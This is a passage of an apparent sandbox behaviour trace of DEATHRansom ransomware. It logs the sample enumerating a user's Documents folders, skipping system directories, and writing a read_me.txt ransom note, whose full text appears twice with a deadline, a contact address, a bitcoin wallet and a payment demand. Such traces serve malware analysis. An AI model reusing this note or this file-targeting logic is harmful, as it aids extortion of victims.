HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6" [0075.268] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 47 [0075.268] QueueUserWorkItem (Function=0x40a710, Context=0x8bc00e8, Flags=0x0) returned 1 [0075.268] GetProcessHeap () returned 0x4f10000 [0075.268] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bd00f0 [0075.269] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\*") returned 79 [0075.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x8349a2d0, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x8349a2d0, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.269] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\.") returned 79 [0075.269] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.269] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.269] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x8349a2d0, ftLastAccessTime.dwHighDateTime=0x1d4c5c4, ftLastWriteTime.dwLowDateTime=0x8349a2d0, ftLastWriteTime.dwHighDateTime=0x1d4c5c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.269] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\..") returned 80 [0075.269] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.269] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x8282f9f0, ftLastAccessTime.dwHighDateTime=0x1d4c952, ftLastWriteTime.dwLowDateTime=0x8282f9f0, ftLastWriteTime.dwHighDateTime=0x1d4c952, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2x0rhX3GpeC7V", cAlternateFileName="2X0RHX~1")) returned 1 [0075.269] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V") returned 91 [0075.269] lstrcmpW (lpString1="2x0rhX3GpeC7V", lpString2="..") returned 1 [0075.269] lstrcmpW (lpString1="2x0rhX3GpeC7V", lpString2=".") returned 1 [0075.269] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="programdata") returned 0x0 [0075.269] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="$recycle.bin") returned 0x0 [0075.269] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="program files") returned 0x0 [0075.269] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="windows") returned 0x0 [0075.269] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="all users") returned 0x0 [0075.270] StrStrW (lpFirst="2x0rhx3gpec7v", lpSrch="appdata") returned 0x0 [0075.270] GetProcessHeap () returned 0x4f10000 [0075.270] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8be00f8 [0075.270] lstrcpyW (in: lpString1=0x8be00f8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V" [0075.270] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 48 [0075.270] QueueUserWorkItem (Function=0x40a710, Context=0x8be00f8, Flags=0x0) returned 1 [0075.271] GetProcessHeap () returned 0x4f10000 [0075.271] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bf0100 [0075.271] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\*") returned 93 [0075.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\*", lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x8282f9f0, ftLastAccessTime.dwHighDateTime=0x1d4c952, ftLastWriteTime.dwLowDateTime=0x8282f9f0, ftLastWriteTime.dwHighDateTime=0x1d4c952, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0075.272] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\.") returned 93 [0075.272] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.272] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x8282f9f0, ftLastAccessTime.dwHighDateTime=0x1d4c952, ftLastWriteTime.dwLowDateTime=0x8282f9f0, ftLastWriteTime.dwHighDateTime=0x1d4c952, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.272] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\..") returned 94 [0075.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.272] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22215060, ftCreationTime.dwHighDateTime=0x1d4d439, ftLastAccessTime.dwLowDateTime=0xd222d3b0, ftLastAccessTime.dwHighDateTime=0x1d4d4f9, ftLastWriteTime.dwLowDateTime=0xd222d3b0, ftLastWriteTime.dwHighDateTime=0x1d4d4f9, nFileSizeHigh=0x0, nFileSizeLow=0x8023, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="--wFzQ_fQiax.ods", cAlternateFileName="--WFZQ~1.ODS")) returned 1 [0075.272] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\--wFzQ_fQiax.ods") returned 108 [0075.272] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5b5ba0, ftCreationTime.dwHighDateTime=0x1d4c8fd, ftLastAccessTime.dwLowDateTime=0x6e17a340, ftLastAccessTime.dwHighDateTime=0x1d4c8ac, ftLastWriteTime.dwLowDateTime=0x6e17a340, ftLastWriteTime.dwHighDateTime=0x1d4c8ac, nFileSizeHigh=0x0, nFileSizeLow=0x908f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="njqLpitsRlBgIkVSRsc.csv", cAlternateFileName="NJQLPI~1.CSV")) returned 1 [0075.272] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\njqLpitsRlBgIkVSRsc.csv") returned 115 [0075.272] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5b5ba0, ftCreationTime.dwHighDateTime=0x1d4c8fd, ftLastAccessTime.dwLowDateTime=0x6e17a340, ftLastAccessTime.dwHighDateTime=0x1d4c8ac, ftLastWriteTime.dwLowDateTime=0x6e17a340, ftLastWriteTime.dwHighDateTime=0x1d4c8ac, nFileSizeHigh=0x0, nFileSizeLow=0x908f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="njqLpitsRlBgIkVSRsc.csv", cAlternateFileName="NJQLPI~1.CSV")) returned 0 [0075.272] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0075.272] wnsprintfW (in: pszDest=0x8bf0100, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\read_me.txt") returned 103 [0075.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\2x0rhx3gpec7v\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.274] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.274] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d57c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d57c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.275] CloseHandle (hObject=0x764) returned 1 [0075.275] GetProcessHeap () returned 0x4f10000 [0075.276] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bf0100 | out: hHeap=0x4f10000) returned 1 [0075.276] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7a0f90, ftCreationTime.dwHighDateTime=0x1d4ca00, ftLastAccessTime.dwLowDateTime=0x885d3760, ftLastAccessTime.dwHighDateTime=0x1d4c7b7, ftLastWriteTime.dwLowDateTime=0x885d3760, ftLastWriteTime.dwHighDateTime=0x1d4c7b7, nFileSizeHigh=0x0, nFileSizeLow=0x11036, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9jFQ OhEgtOJ1L.ots", cAlternateFileName="9JFQOH~1.OTS")) returned 1 [0075.276] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\9jFQ OhEgtOJ1L.ots") returned 96 [0075.276] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7cb500, ftCreationTime.dwHighDateTime=0x1d4cc2f, ftLastAccessTime.dwLowDateTime=0x3d7466c0, ftLastAccessTime.dwHighDateTime=0x1d4d45e, ftLastWriteTime.dwLowDateTime=0x3d7466c0, ftLastWriteTime.dwHighDateTime=0x1d4d45e, nFileSizeHigh=0x0, nFileSizeLow=0xf820, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ENUz6f.pps", cAlternateFileName="")) returned 1 [0075.276] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\ENUz6f.pps") returned 88 [0075.276] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc87179b0, ftCreationTime.dwHighDateTime=0x1d4c645, ftLastAccessTime.dwLowDateTime=0x176719c0, ftLastAccessTime.dwHighDateTime=0x1d4c6b5, ftLastWriteTime.dwLowDateTime=0x176719c0, ftLastWriteTime.dwHighDateTime=0x1d4c6b5, nFileSizeHigh=0x0, nFileSizeLow=0x49b2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fu2JzaZ.pdf", cAlternateFileName="")) returned 1 [0075.276] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\fu2JzaZ.pdf") returned 89 [0075.276] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x51b29880, ftLastAccessTime.dwHighDateTime=0x1d4d05a, ftLastWriteTime.dwLowDateTime=0x51b29880, ftLastWriteTime.dwHighDateTime=0x1d4d05a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mK_tjRRPSh202XbyB", cAlternateFileName="MK_TJR~1")) returned 1 [0075.276] wnsprintfW (in: pszDest=0x8bd00f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB") returned 95 [0075.276] lstrcmpW (lpString1="mK_tjRRPSh202XbyB", lpString2="..") returned 1 [0075.276] lstrcmpW (lpString1="mK_tjRRPSh202XbyB", lpString2=".") returned 1 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="programdata") returned 0x0 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="$recycle.bin") returned 0x0 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="program files") returned 0x0 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="windows") returned 0x0 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="all users") returned 0x0 [0075.276] StrStrW (lpFirst="mk_tjrrpsh202xbyb", lpSrch="appdata") returned 0x0 [0075.276] GetProcessHeap () returned 0x4f10000 [0075.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bf0100 [0075.276] lstrcpyW (in: lpString1=0x8bf0100, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB" [0075.276] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 49 [0075.276] QueueUserWorkItem (Function=0x40a710, Context=0x8bf0100, Flags=0x0) returned 1 [0075.276] GetProcessHeap () returned 0x4f10000 [0075.276] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c00108 [0075.277] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\*") returned 97 [0075.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\*", lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x51b29880, ftLastAccessTime.dwHighDateTime=0x1d4d05a, ftLastWriteTime.dwLowDateTime=0x51b29880, ftLastWriteTime.dwHighDateTime=0x1d4d05a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0075.277] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\.") returned 97 [0075.277] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.277] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x51b29880, ftLastAccessTime.dwHighDateTime=0x1d4d05a, ftLastWriteTime.dwLowDateTime=0x51b29880, ftLastWriteTime.dwHighDateTime=0x1d4d05a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.277] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\..") returned 98 [0075.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.277] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908e36a0, ftCreationTime.dwHighDateTime=0x1d4d531, ftLastAccessTime.dwLowDateTime=0x34212250, ftLastAccessTime.dwHighDateTime=0x1d4cdad, ftLastWriteTime.dwLowDateTime=0x34212250, ftLastWriteTime.dwHighDateTime=0x1d4cdad, nFileSizeHigh=0x0, nFileSizeLow=0x6a7b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mZk3qpXWxbFEStM.xlsx", cAlternateFileName="MZK3QP~1.XLS")) returned 1 [0075.278] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\mZk3qpXWxbFEStM.xlsx") returned 116 [0075.278] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa605d600, ftCreationTime.dwHighDateTime=0x1d4d06d, ftLastAccessTime.dwLowDateTime=0x13d4de50, ftLastAccessTime.dwHighDateTime=0x1d4cc73, ftLastWriteTime.dwLowDateTime=0x13d4de50, ftLastWriteTime.dwHighDateTime=0x1d4cc73, nFileSizeHigh=0x0, nFileSizeLow=0x17a3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YwAoWvLQX1Qkqb1WAal.xls", cAlternateFileName="YWAOWV~1.XLS")) returned 1 [0075.278] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\YwAoWvLQX1Qkqb1WAal.xls") returned 119 [0075.278] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa605d600, ftCreationTime.dwHighDateTime=0x1d4d06d, ftLastAccessTime.dwLowDateTime=0x13d4de50, ftLastAccessTime.dwHighDateTime=0x1d4cc73, ftLastWriteTime.dwLowDateTime=0x13d4de50, ftLastWriteTime.dwHighDateTime=0x1d4cc73, nFileSizeHigh=0x0, nFileSizeLow=0x17a3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YwAoWvLQX1Qkqb1WAal.xls", cAlternateFileName="YWAOWV~1.XLS")) returned 0 [0075.278] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0075.278] wnsprintfW (in: pszDest=0x8c00108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\read_me.txt") returned 107 [0075.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\mk_tjrrpsh202xbyb\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.317] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.317] WriteFile (in: hFile=0x7a4, lpBuffer=0x4f55310*, 